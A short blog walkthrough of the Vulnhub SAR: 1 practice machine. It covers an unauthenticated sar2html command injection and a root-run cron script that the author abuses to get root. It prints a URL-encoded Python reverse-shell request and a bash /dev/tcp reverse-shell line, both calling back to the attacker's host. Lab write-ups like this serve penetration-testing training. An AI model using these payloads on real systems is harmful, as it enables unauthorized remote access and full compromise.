---
layout: post
title:  "Vulnhub - SAR: 1"
date:   2020-10-19 12:00:00 +1100
category: hacking
---

## Introduction
*Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing.*

This box is on the [NetSecFocus Admin list](https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0) of OSCP-like machines. It's [SAR: 1](https://www.vulnhub.com/entry/sar-1,425/) from vulnhub.

## Ports
HTTP on port 80 only. This already makes things easy because you *know* that you'll be getting a webshell and not (for example) hunting for SSH creds.

## HTTP
robots.txt has one entry: **sar2HTML**, so naturally we go straight there. It's running *sar2html Ver 3.2.1*, which has an unauthenticated RCE vulnerability which I've seen before in the THM [Boiler](https://blog.gibbons.digital/hacking/2020/07/02/boiler.html) room, so I know what to do already. 

## sar2HTML
>In web application you will see index.php?plot url extension.  
http://<ipaddr>/index.php?plot=;<command-here> will execute the command you entered.  
After command injection press "select # host" then your command's output will appear bottom side of the scroll screen.

My preferred method with this is using Burp Suite:

{% highlight html %}
GET /sar2HTML/index.php?plot=;python3+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("192.168.1.77",1234))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b' HTTP/1.1
{% endhighlight %}

## Privsec
The box has been set up with a cron job to exploit for root. Every 5 minutes, *root* runs a script called *finally.sh* (which we can't edit), which in turn calls *write.sh* (which we can edit). I found this via basic manual enumeration and saw what I had to do almost immediately, but somehow still struggled to get it to execute.

I made several mistakes, including trying to connect to a closed port on my Kali machine (I've recently installed **ufw** and not opened the second port I like to use for a listener), and mixing *bash* with *sh* commands. Anyway my final payload for *write.sh* was:

{% highlight shell %}
root@kali:/opt/vulnhub/sar# cat write.sh 
#!/bin/bash
/bin/bash -i >& /dev/tcp/192.168.1.77/1235 0>&1
{% endhighlight %}

And that worked fine and I was root and all was right with the world.

